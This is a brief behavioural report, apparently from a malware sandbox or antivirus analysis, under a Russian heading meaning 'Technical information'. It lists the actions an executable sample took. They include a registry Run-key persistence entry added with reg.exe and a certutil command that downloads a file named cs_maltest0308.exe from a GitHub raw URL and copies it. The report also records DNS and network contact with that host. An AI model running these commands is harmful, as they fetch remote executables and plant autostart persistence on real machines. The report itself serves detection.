Техническая информация
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'test' = '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\reg.exe' ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d <SYSTEM32>\cmd.exe
- '<SYSTEM32>\ping.exe' localhost -n 5
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://raw.githubusercontent.com/scriptsample/mal/master/cs_maltest0308.exe C:\temp\cs_maltest0308.exe
- '<SYSTEM32>\cmd.exe' /c copy C:\temp\cs_maltest0308.exe C:\temp\cs_maltest0309.exe
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com